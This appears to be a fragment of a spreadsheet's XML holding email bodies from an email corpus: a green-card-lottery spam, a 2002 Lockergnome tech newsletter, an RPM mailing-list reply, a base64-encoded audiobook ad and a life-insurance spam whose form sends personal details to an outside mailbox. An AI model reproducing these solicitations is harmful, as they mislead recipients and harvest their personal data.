 height="104" border="0"&gt;&lt;/a&gt;
   &lt;a href="http://81.9.8.6/gcvc/index.htm"&gt;&lt;img
 src="http://81.9.8.6/gcvc/images/help.gif" width="81" height="104"
 border="0"&gt;&lt;/a&gt;
   &lt;a href="http://81.9.8.6/gcvc/index.htm"&gt;&lt;img
 src="http://81.9.8.6/gcvc/images/apply.gif" width="86" height="102"
 border="0"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;/div&gt;
 &lt;/td&gt;
 &lt;td&gt;&lt;img src="http://81.9.8.6/gcvc/images/space.gif" width="5"
 height="1" border="0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="550" border="0" cellspacing="50" cellpadding="0"
 align="center"&gt;
   &lt;tr&gt;
     &lt;td align="left"&gt;
   &lt;hr width="80%" align="center"&gt;&lt;p&gt;
   &lt;font face="arial" size="2" color="black"&gt;
 &lt;b&gt;Why Use Our Services?&lt;/b&gt;&lt;br&gt;
 Our Organization allows you to fill your application online and ensure that
 your application qualifies! You should note that according to the US INS out
 of the 10,000,000 applications submitted in one year; 3,000,000 were
 disqualified because of bad formatting or misunderstandings of the
 requirements.&lt;p&gt;
 &lt;div align="center"&gt;&lt;b&gt;&lt;a href="http://81.9.8.6/gcvc/index.htm"&gt;&lt;font
 size="3"&gt;Take the FREE TEST to ensure your entry qualifies to
 participate!&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;&lt;p&gt;
 If you have further questions please don't hesitate to contact us.&lt;p&gt;
 Sincerely yours,&lt;p&gt;
 The American Green Card Lottery&lt;p&gt;&amp;nbsp;&lt;p&gt;
 &lt;font size="1"&gt;-------------------------------------------------------------------
 -------------&lt;br&gt;
 If you do not want to receive any further emails simply go to our &lt;a
 href="http://81.9.8.6/delister/"&gt;unsubscribe page&lt;/a&gt; enter your email
 address and you will be removed.
 &lt;/font&gt;&lt;/font&gt;
 &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 &lt;br&gt;&amp;nbsp&lt;p&gt;
     &lt;/td&gt;
     &lt;td bgcolor="#000000" width="1"&gt;&lt;img
 src="http://81.9.8.6/gcvc/images/space.gif" width="1" height="1"
 border="0"&gt;&lt;/td&gt;
     &lt;td bgcolor="#006699" width="100%"&gt;&amp;nbsp&lt;img
 src="http://81.9.8.6/gcvc/images/space.gif" width="100%" height="1"
 border="0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font color="#FFFFFF"&gt;
 6176beqF7-143ocLa5593QDxD2-983vol30
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/techspecialist/20020710.html"&gt;
       http://www.lockergnome.com/issues/techspecialist/20020710.html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&lt;/style&gt;&lt;title&gt;20020710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07.10.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;WE NEED YOU TO BE AT GNOMEDEX!&lt;/b&gt; That's what your employer should be 
 telling you. Microsoft Pocket PC experts will be sharing tips on improving 
 workplace productivity with portable devices. Combined with Proxim's on 
 location wireless networking solutions, a Pocket PC can keep you and your 
 co-workers communicating no matter where you are in the building. Learn 
 how to bring Wi-FI and PDA technologies together for the ultimate in 
 portable computing. 
 &lt;a href="http://www.gnomedex.com"&gt;Register for Gnomedex today&lt;/a&gt;!   
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 Reader Jack Macdonald has some advice for you would-be bards in the audience: 
 &lt;p&gt;"You mention Karaoke being featured at Gnomedex and you 
 might want to point out to other Gnomies that they could 
 practice their Karaoke on my &lt;a 
 href="http://www.geocities.com/Broadway/Lobby/1009/"&gt;Red Hot 
 Karaoke Page&lt;/a&gt; site. There are the words and music for 
 more than 1100 songs available on the site and by 
 downloading the Yamanha Midiplug (a link is provided) they 
 can even change the key of the song to suit their voice 
 range as well as speed up or slow down the music to their 
 taste. In other words, to have the same experience as they 
 would have with professional Karaoke equipment but at no 
 extra cost! At this price (zero) a lot of gnomies going to 
 Gnomedex could be singing up a storm by being properly 
 prepared for your Karaoke."
 &lt;p&gt;Travel day on Wednesday as I head down to Ankeny, Iowa to 
 help out a former co-worker and avid Gnomie with some server 
 and networking stuff. The tough part is remembering 
 everything I'll need. It never fails, though. I always, 
 always, always forget something. I can make lists two weeks 
 in advance and I'll end up 30 miles down the road with a 
 handprint on my forehead when I come to the realization that 
 I left something important behind. What will it be this 
 time, I wonder? I'll let you know on Thursday.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&lt;b&gt;Forwarding to Internet Address Fails&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://support.microsoft.com/default.aspx?scid=kb;EN-US;q181636"&gt;http://support.microsoft.com/default.aspx?scid=kb;EN-US;q181636&lt;/a&gt;
 &lt;p&gt;Client inquires about the possibility of forwarding all 
 internal and Internet email to his AOL mailbox when he's out 
 of the office, and I figure it's going to be a piece of 
 cake. He recently acquired a new phone through Verizon along 
 with web access and a tie into his AOL mailbox, which was 
 the driving force behind this request. What I found was that 
 Internet email proved to be easy using a simple forwarding 
 rule, but none of the internal Exchange email was being sent 
 out to the Internet upon receipt, even though it appeared to 
 be included in the rule. As it happens, this is due to a 
 default configuration option on the Exchange 5.5 server that 
 prevents automatic replies/forwards from being sent to the 
 Internet using the Exchange Internet Mail Service. A quick 
 configuration change and restart of IMS will put things 
 right.
 &lt;!-- GnomeSYSTEM --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSYSTEM&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Stop the Presses&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.wininformant.com/Articles/Index.cfm?ArticleID=25802"&gt;http://www.wininformant.com/Articles/Index.cfm?ArticleID=25802&lt;/a&gt;
 &lt;p&gt;... The CD presses, that is. Microsoft has given in to 
 the greater good and delayed Windows 2000 Service Pack 3 
 indefinitely. Sure, it's mildly disappointing, but I applaud 
 the move. Instead of trying to downplay the previously 
 identified problems with Microsoft Installer (MSI) 2.0, the 
 service pack will be put on ice until the issues are 
 straightened out. Here's a quote for you... Good job, 
 Microsoft.
 &lt;!-- GnomeALERTZ --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeALERTZ&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Today's Top 5 kbAlertz&lt;/b&gt;
 &lt;p&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q198845"&gt;Q198845 - WD2000: How to Return Only File Names Using FileSearch Property (Q198845)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q310436"&gt;Q310436 - Cannot Play a DVD in Windows XP (Q310436)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q321305"&gt;Q321305 - How to Log On to Windows XP If You Forget Your Password or Your Password Expires (Q321305)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q321146"&gt;Q321146 - Freddi Fish 2: The Case of the Haunted Schoolhouse Program Causes an Error Message in Windows XP (Q321146)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q321144"&gt;Q321144 - Visioneer One Touch 8100 Scanner Causes an Error Message in Windows XP (Q321144)&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;&lt;/p&gt; 
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;A HREF="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;&lt;img src="http://www.lockergnome.com/lgstore/sunshop/images/productpics/computerbasics.jpg" alt="TechTV's Computer Basics" height="109" width="63" border="2" hspace="10" align="left"&gt;&lt;/a&gt;
 &lt;b&gt;CHRIS TEACHES THE BASICS:&lt;/b&gt; If you've got friends or family who want to learn more about their PC, from a guy who makes things nice and easy, check out the VHS release of &lt;a href="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;Computer Basics&lt;/a&gt; in the GnomeStore. Chris teams with TechTV cohort, Kate Botello, to lead novices on a journey through their computer. From basic interactions, to installing apps, to using the Internet and e-mail, Chris and Kate have all the basics covered. Help out a friend and  &lt;a href="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;get them a copy&lt;/a&gt; today.    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;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&lt;b&gt;Windows XP System File Checker&lt;/b&gt;
 &lt;p&gt;Dean Truax mentioned the System File Checker as a 
 possible solution to my Windows Media Player problem under 
 Windows XP, and I did indeed run through it prior to 
 attempting an in-place upgrade, obviously with no 
 improvement. It's still worth a mention, however, in case 
 you're not familiar with what it's there for. As you're 
 probably aware, XP contains a file protection scheme that 
 will immediate replace any system files that are deleted or 
 altered in any way, ensuring that XP is kept in a stable 
 state. Sometimes this system can get a little out of whack, 
 and the SFC is meant to restore order. Note that any 
 hotfixes and other Microsoft-provided updates will be left 
 in place since they properly update the DLL Cache that is 
 used as the sanity check to determine if a system file has 
 been messed with. To access the SFC, simply launch a command 
 prompt and type "SFC" to display a list of options.
 &lt;!-- GnomeSTUFF --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSTUFF&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Consider This&lt;/b&gt;
 &lt;br&gt;Forwarded by JW
 &lt;p&gt;&lt;a class="url" href="http://www.computerworld.com/securitytopics/security/story/0,10801,72519,00.html"&gt;http://www.computerworld.com/securitytopics/security/story/0,10801,72519,00.html&lt;/a&gt;
 &lt;p&gt;The next time you have a face-to-face with your elected 
 representatives, you might want to start asking about their 
 opinions on technology laws that are being proposed left and 
 right. Holding a public office seems to be introducing brain 
 death more frequently considering proposals by Senator Fritz 
 Hollings and now LA congressman Howard Berman. If Mr. Berman 
 gets his way, companies may very well be allowed to hack 
 into your systems without proof of provocation in order to 
 ensure that you are using their software according to the 
 stated rules. Mind you, if they cause colateral damage or 
 upset other systems, there isn't thing one you can do in 
 return. Nope, they'll have legal protection. This garbage is 
 seriously getting scary. If you think it won't be abused, 
 consider the case of Dimitry Skylarov when he publicly 
 pointed out eBook security problems with Adobe's software 
 and was promptly thrown in jail for his trouble under the 
 authority of the Digital Millenium Copyright Act. He was 
 eventually released, but that doesn't make it any more 
 right.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href="http://www.lockergnome.com/issues/techspecialist/20020710.html"&gt;http://www.lockergnome.com/issues/techspecialist/20020710.html&lt;/a&gt;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</si>
  <si>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Hi, Matthias..
 &gt; ..it's a major release and supports now SGI's FAM technology
 ..requires currently some changes for the spec because the dep to fam
 2.6.7-6.
 For compiling fam.h (fam-evel) is required too.
 -- 
 regards from Germany
                    Matthias
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: yyyy Your computer can READ! ! !
</t>
  </si>
  <si>
    <t xml:space="preserve">PGh0bWw+PGJvZHkgYmdjb2xvcj0jRkZGRkZGIHRleHQ9IzAwMDAwMD4gPHRhYmxlIHdpZHRo
 PTUwMCBib3JkZXI9MCBjZWxsc3BhY2luZz0wIGNlbGxwYWRkaW5nPTAgYWxpZ249Y2VudGVy
 Pjx0cj48dGQ+PGEgaHJlZj1odHRwOi8vd3d3LmdhdGUxMjAuY29tL2Jvb2tjZHJvbS8+PGlt
 ZyBzcmM9aHR0cDovL3d3dy5nYXRlMTIwLmNvbS9ib29rY2Ryb20vaGVhZC5qcGcgd2lkdGg9
 NTAwIGhlaWdodD0xNTkgYm9yZGVyPTA+PC9hPjwvdGQ+PC90cj48dHI+PHRkIGhlaWdodD0w
 PiA8ZGl2IGFsaWduPWNlbnRlcj48cD48Zm9udCBmYWNlPSJUaW1lcyBOZXcgUm9tYW4sIFRp
 bWVzLCBzZXJpZiIgc2l6ZT0zIGNvbG9yPSMwMDAwMDA+PGI+PGk+PGI+PGZvbnQgc2l6ZT00
 Pi4uLnRoYXQgeW91ciBjb21wdXRlciA8L2ZvbnQ+PGZvbnQgc2l6ZT00IGNvbG9yPSMwMDAw
 RkY+PHU+PGEgaHJlZj1odHRwOi8vd3d3LmdhdGUxMjAuY29tL2Jvb2tjZHJvbS8+cmVhZHMg
 dG8geW91IGFsb3VkITwvYT48L3U+PC9mb250PjwvYj48L2k+PC9iPjwvZm9udD48L3A+PHA+
 Jm5ic3A7PC9wPiA8L2Rpdj48L3RkPjwvdHI+PHRyPjx0ZCB2YWxpZ249dG9wPjxwPjxmb250
 IHNpemU9MiBmYWNlPSJBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIj5UaGlzIGNvbGxl
 Y3Rpb24gaW5jbHVkZXMgdGhlIGNvbXBsZXRlIHdvcmtzIG9mIHRob3VzYW5kcyBvZiBsaXRl
 cmF0dXJlLCBwb2V0cnksIGNsYXNzaWNzLCByZWZlcmVuY2UsIGhpc3RvcmljYWwgZG9jdW1l
 bnRzLCBhbmQgZXZlbiBjbGFzc2ljYWwgbXVzaWMhIFRoZXJlIGFyZSBodW5kcmVkcyBvZiBh
 dXRob3JzIGFuZCB0aG91c2FuZHMgb2YgYm9va3Mgb24gdGhpcyBDRCEhPC9mb250PjwvcD48
 cD48Zm9udCBzaXplPTIgZmFjZT0iQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiI+PGI+
 WW91ciBjb21wdXRlciB3aWxsIGFjdHVhbGx5IFJFQUQgeW91IHRoZSBib29rIHRocm91Z2gg
 eW91ciBzcGVha2VyczwvYj4sIGhpZ2hsaWdodGluZyB0aGUgdGV4dCBhcyBpdCByZWFkcyEg
 PC9mb250PjwvcD48cCBhbGlnbj1jZW50ZXI+PGZvbnQgc2l6ZT0yIGZhY2U9IkFyaWFsLCBI
 ZWx2ZXRpY2EsIHNhbnMtc2VyaWYiPjxiPjxmb250IHNpemU9Mz5TaXQgYmFjayAtIGNsb3Nl
 IHlvdXIgZXllcyAtIGFuZCBlbmpveSBhIGJvb2shPC9mb250PjwvYj48L2ZvbnQ+PC9wPjxw
 Pjxmb250IGZhY2U9IkFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIHNpemU9Mj5JdCBp
 bmNsdWRlcyBhdXRob3JzIGxpa2UgU2hha2VzcGVhcmUsIERpY2tlbnMsIFdlbGxzLCBWZXJu
 ZSwgRG95bGUsIFN0ZXZlbnNvbiwgVGhvcmVhdSwgUGxhdG8sIGFuZCBIVU5EUkVEUyBvZiBv
 dGhlcnMhIDxhIGhyZWY9aHR0cDovL3d3dy5nYXRlMTIwLmNvbS9ib29rY2Ryb20vPlNlZSBs
 aXN0cyBvZiBhdXRob3JzIGFuZCB0aXRsZXMhPC9hPjwvZm9udD48L3A+PHA+Jm5ic3A7PC9w
 PjwvdGQ+PC90cj48dHI+PHRkIHZhbGlnbj10b3A+IDx0YWJsZSB3aWR0aD04NSUgYm9yZGVy
 PTAgY2VsbHNwYWNpbmc9MCBjZWxscGFkZGluZz0wIGFsaWduPWNlbnRlcj48dHI+PHRkIHZh
 bGlnbj10b3A+PHVsPjxsaT48Zm9udCBmYWNlPSJBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNl
 cmlmIiBzaXplPTIgY29sb3I9IzAwMDAwMD5UaGVzZSBhcmUgdGhlIGNvbXBsZXRlLCBmdWxs
 LCB1bmFicmlkZ2VkIHRleHRzPC9mb250PjwvbGk+PGxpPjxmb250IGZhY2U9IkFyaWFsLCBI
 ZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIHNpemU9MiBjb2xvcj0jMDAwMDAwPkl0J3MgbGlrZSBv
 d25pbmcgb3ZlciAzMDAwIGJvb2tzIG9uIDxiPmF1ZGlvIENEPC9iPjwvZm9udD48L2xpPjxs
 aT48Zm9udCBmYWNlPSJBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIiBzaXplPTIgY29s
 b3I9IzAwMDAwMD5Nb3JlIHRoYW4gMS41IEdJR0FCWVRFUyBvZiBkYXRhIGNvbXByZXNzZWQg
 b250byBvbmUgQ0Q8L2ZvbnQ+PC9saT48bGk+PGZvbnQgZmFjZT0iQXJpYWwsIEhlbHZldGlj
 YSwgc2Fucy1zZXJpZiIgc2l6ZT0yIGNvbG9yPSMwMDAwMDA+TW9yZSB0aGFuIDMsMDAwIHRp
 dGxlczwvZm9udD48L2xpPjxsaT48Zm9udCBmYWNlPSJBcmlhbCwgSGVsdmV0aWNhLCBzYW5z
 LXNlcmlmIiBzaXplPTIgY29sb3I9IzAwMDAwMD5BdXRvLWluc3RhbGxhdGlvbiA8L2ZvbnQ+
 PC9saT48bGk+PGZvbnQgZmFjZT0iQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiIgc2l6
 ZT0yIGNvbG9yPSMwMDAwMDA+RWFzeS10by11c2UgaW5kZXg8L2ZvbnQ+PC9saT48bGk+PGZv
 bnQgZmFjZT0iQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiIgc2l6ZT0yIGNvbG9yPSMw
 MDAwMDA+Qm9va21hcmtzIHlvdXIgcG9zaXRpb24gb24gcmVjZW50bHkgcmVhZCB0aXRsZXM8
 L2ZvbnQ+PC9saT48bGk+PGZvbnQgZmFjZT0iQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJp
 ZiIgc2l6ZT0yIGNvbG9yPSMwMDAwMDA+PGI+PGk+R3JlYXQgZ2lmdDwvaT48L2I+IGZvciBz
 dHVkZW50cywgcmVhZGluZyBlbnRodXNpYXN0cywgb3IgdGhlIHZpc2lvbiBpbXBhaXJlZDwv
 Zm9udD48L2xpPjwvdWw+PC90ZD48L3RyPiA8L3RhYmxlPjwvdGQ+PC90cj48dHI+PHRkPiA8
 dGFibGUgd2lkdGg9NzUlIGJvcmRlcj0wIGNlbGxzcGFjaW5nPTEyIGNlbGxwYWRkaW5nPTAg
 YWxpZ249Y2VudGVyPjx0cj48dGQ+PGEgaHJlZj1odHRwOi8vd3d3LmdhdGUxMjAuY29tL2Jv
 b2tjZHJvbS8+PGltZyBzcmM9aHR0cDovL3d3dy5nYXRlMTIwLmNvbS9ib29rY2Ryb20vY2Qz
 LmdpZiB3aWR0aD05OCBoZWlnaHQ9NzAgYm9yZGVyPTA+PC9hPjwvdGQ+PHRkPjxwPjxpPjxi
 PlJlZ3VsYXIgUHJpY2U6ICQzOTxhIGhyZWY9aHR0cDovL3d3dy5nYXRlMTIwLmNvbS9ib29r
 Y2Ryb20vPi48L2E+MDA8L2I+PC9pPjwvcD48cD48aT48Yj48Zm9udCBzaXplPTQ+Tk9XICQx
 OS45NSA8Zm9udCBzaXplPTM+cGx1cyBzaGlwcGluZzwvZm9udD48L2ZvbnQ+PC9iPjwvaT48
 L3A+PHA+PGk+PGI+PGEgaHJlZj1odHRwOi8vd3d3LmdhdGUxMjAuY29tL2Jvb2tjZHJvbS8+
 Q2xpY2sgSGVyZTwvYT4gZm9yIG1vcmUgaW5mb3JtYXRpb24hPC9iPjwvaT48L3A+PC90ZD48
 L3RyPiA8L3RhYmxlPjwvdGQ+PC90cj48dHI+PHRkIGhlaWdodD0yMT4mbmJzcDs8L3RkPjwv
 dHI+IDwvdGFibGU+IA0KPHAgYWxpZ249ImNlbnRlciI+PGEgaHJlZj1odHRwOi8vd3d3LnNu
 YXAtYmFjay5jb20vY2dpLWJpbi90LmNnaT9rPXByb21vOjE+PGltZyBzcmM9aHR0cDovL3d3
 dy5ucGFnLm5ldC9ob21lYmFzZWQvZW1haWxfdGVtcC9lbWFpbDEyL3JlbW92ZS5naWYgd2lk
 dGg9NTUwIGhlaWdodD0xNjggYm9yZGVyPTA+PC9hPiA8L2JvZHk+PC9odG1sPg0Kam1AbmV0
 bm90ZWluYy5jb20=
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Save On Your Insurance
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Insurance&lt;/TITLE&gt;&lt;STYLE&gt;td {font-family: arial}&lt;/STYLE&gt;&lt;=
 /HEAD&gt;
 &lt;BODY BGCOLOR=3D#FDF5E6&gt;&lt;DIV ALIGN=3DCENTER STYLE=3DFONT-FAMILY:TIMES&gt;&lt;FON=
 T SIZE=3D+3 COLOR=3DRED&gt;Save up to 70% on your Life Insurance!&lt;/FONT&gt;&lt;BR&gt;&lt;=
 FONT SIZE=3D+2&gt;Why Spend More Than You Have To?&lt;BR&gt;Life Quote Search saves=
  you time and money. &lt;P&gt;
 &lt;B&gt;&lt;/FONT&gt;&lt;BR&gt;Check out these example monthly rates...&lt;BR&gt;10-year level pr=
 emium term insurance&lt;BR&gt;(20 and 30 year rates also available)&lt;/DIV&gt;
 &lt;TABLE WIDTH=3D500 ALIGN=3DCENTER BGCOLOR=3DWHITE&gt;
 &lt;TR&gt;
 &lt;TD&gt;&lt;/TD&gt; 
 &lt;TD COLSPAN=3D2 ALIGN=3DCENTER&gt;$250,000&lt;/TD&gt; 
 &lt;TD COLSPAN=3D2 ALIGN=3DCENTER&gt;$500,000&lt;/TD&gt; 
 &lt;TD COLSPAN=3D2 ALIGN=3DCENTER&gt;$1,000,000&lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;TR BGCOLOR=3D#003366&gt; 
 &lt;TD STYLE=3DCOLOR:WHITE&gt;Age&lt;/TD&gt; 
 &lt;TD STYLE=3DCOLOR:WHITE&gt;Male&lt;/TD&gt; 
 &lt;TD STYLE=3DCOLOR:WHITE&gt;Female&lt;/TD&gt; 
 &lt;TD STYLE=3DCOLOR:WHITE&gt;Male&lt;/TD&gt; 
 &lt;TD STYLE=3DCOLOR:WHITE&gt;Female&lt;/TD&gt; 
 &lt;TD STYLE=3DCOLOR:WHITE&gt;Male&lt;/TD&gt; 
 &lt;TD STYLE=3DCOLOR:WHITE&gt;Female&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD&gt;30&lt;/TD&gt;&lt;TD&gt;$12&lt;/TD&gt;&lt;TD&gt;$11&lt;/TD&gt;&lt;TD&gt;$19&lt;/TD&gt;&lt;TD&gt;$15&lt;/TD&gt;&lt;TD&gt;$31&lt;/TD&gt;&lt;TD=
 &gt;$27&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD&gt;40&lt;/TD&gt;&lt;TD&gt;$15&lt;/TD&gt;&lt;TD&gt;$13&lt;/TD&gt;&lt;TD&gt;$26&lt;/TD&gt;&lt;TD&gt;$21&lt;/TD&gt;&lt;TD&gt;$38&lt;/TD&gt;&lt;TD=
 &gt;$37&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD&gt;50&lt;/TD&gt;&lt;TD&gt;$32&lt;/TD&gt;&lt;TD&gt;$24&lt;/TD&gt;&lt;TD&gt;$59&lt;/TD&gt;&lt;TD&gt;$43&lt;/TD&gt;&lt;TD&gt;$107&lt;/TD&gt;&lt;T=
 D&gt;$78&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD&gt;60&lt;/TD&gt;&lt;TD&gt;$75&lt;/TD&gt;&lt;TD&gt;$46&lt;/TD&gt;&lt;TD&gt;$134&lt;/TD&gt;&lt;TD&gt;$87&lt;/TD&gt;&lt;TD&gt;$259&lt;/TD&gt;&lt;=
 TD&gt;$161&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;DIV ALIGN=3DCENTER&gt;(Smoker rates also available)&lt;P&gt;&lt;FONT SIZE=3D+1&gt;Take a=
  minute to fill out the simple form below and receive a FREE quote&lt;BR&gt;comp=
 aring the best values from among hundreds of the nation's top insurance co=
 mpanies!&lt;/FONT&gt;&lt;/DIV&gt;&lt;HR SIZE=3D1&gt;&lt;TABLE&gt;&lt;TD&gt;&lt;FORM ACTION=3D'mailto:a7a2@b=
 tamail.net.cn?subject=3D01' METHOD=3DPOST ENCTYPE=3DTEXT/PLAIN&gt;*All Fields=
  required&lt;/TD&gt;&lt;/TR&gt;&lt;TD&gt;First Name:&lt;/TD&gt;&lt;TD&gt;&lt;INPUT NAME=3DFIRST_NAME&gt;&lt;/TD&gt;&lt;=
 /TR&gt;&lt;TR&gt;&lt;TD&gt;Last Name:&lt;/TD&gt;&lt;TD&gt;&lt;INPUT NAME=3DLAST_NAME&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;A=
 ddress:&lt;/TD&gt;&lt;TD&gt;&lt;INPUT NAME=3DADDRESS&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;City:&lt;/TD&gt;&lt;TD&gt;&lt;INPUT NAME=3DCITY&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;State:&lt;/TD=
 &gt;&lt;TD&gt;&lt;INPUT NAME=3DSTATE SIZE=3D2&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;Zip:&lt;/TD&gt;&lt;TD&gt;&lt;INPUT NA=
 ME=3DZIP_CODE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;Day Phone:&lt;/TD&gt;&lt;TD&gt;&lt;INPUT NAME=3DDAY_PHONE=
 &gt; (xxx-xxx-xxxx)&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;Evening Phone:&lt;/TD&gt;&lt;TD&gt;&lt;INPUT NAME=3DEVE=
 NING_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;Fax:&lt;/TD&gt;&lt;TD&gt;&lt;INPUT NAME=3DFAX&gt; (xxx-xxx-xxxx=
 )&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;Email:&lt;/TD&gt;&lt;TD&gt;&lt;INPUT NAME=3DEMAIL&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;Male or Female:&lt;/TD&gt;&lt;TD&gt;&lt;INPUT NAME=3DMALE_OR_FEMALE&gt;&lt;/TD&gt;&lt;/T=
 R&gt;&lt;TR&gt;&lt;TD&gt;Date of Birth:&lt;/TD&gt;&lt;TD&gt;&lt;INPUT NAME=3DDATE_OF_BIRTH SIZE=3D13&gt;
 (mm/dd/yy)&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;Type of Insurance:&lt;/TD&gt;&lt;TD&gt;&lt;SELECT NAME=3DTYPE=
 _OF_INSURANCE SIZE=3D1&gt;&lt;OPTION&gt;30
 Yr Guaranteed Level Term&lt;OPTION SELECTED&gt;20
 Yr Guaranteed Level Term&lt;OPTION&gt;15 Yr Guaranteed Level Term&lt;OPTION&gt;10
 Yr Guaranteed Level Term&lt;OPTION&gt;Universal Life&lt;OPTION&gt;2nd-to-die
 (Survivorship Insurance)&lt;/SELECT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;Insurance Amount:&lt;/TD&gt;&lt;=
 TD&gt;&lt;SELECT NAME=3DINSURANCE_AMOUNT&gt;&lt;OPTION&gt;$100,000&lt;OPTION&gt;$150,000&lt;OPTION=
 &gt;$200,000&lt;OPTION&gt;$250,000&lt;OPTION&gt;$300,000&lt;OPTION&gt;$350,000&lt;OPTION&gt;$400,000&lt;=
 OPTION&gt;$450,000&lt;OPTION SELECTED&gt;$500,000&lt;OPTION&gt;$550,000&lt;OPTION&gt;$600,000&lt;O=
 PTION&gt;$650,000&lt;OPTION&gt;$700,000&lt;OPTION&gt;$750,000&lt;OPTION&gt;$800,000&lt;OPTION&gt;$850=
 ,000&lt;OPTION&gt;$900,000&lt;OPTION&gt;$950,000&lt;OPTION&gt;$1,000,000&lt;OPTION&gt;$1,500,000&lt;O=
 PTION&gt;$2,000,000&lt;OPTION&gt;$2,500,000&lt;OPTION&gt;$3,000,000&lt;OPTION&gt;$3,500,000&lt;OPT=
 ION&gt;$4,000,000&lt;OPTION&gt;$4,500,000&lt;OPTION&gt;$5,000,000&lt;OPTION&gt;above $5,000,000=
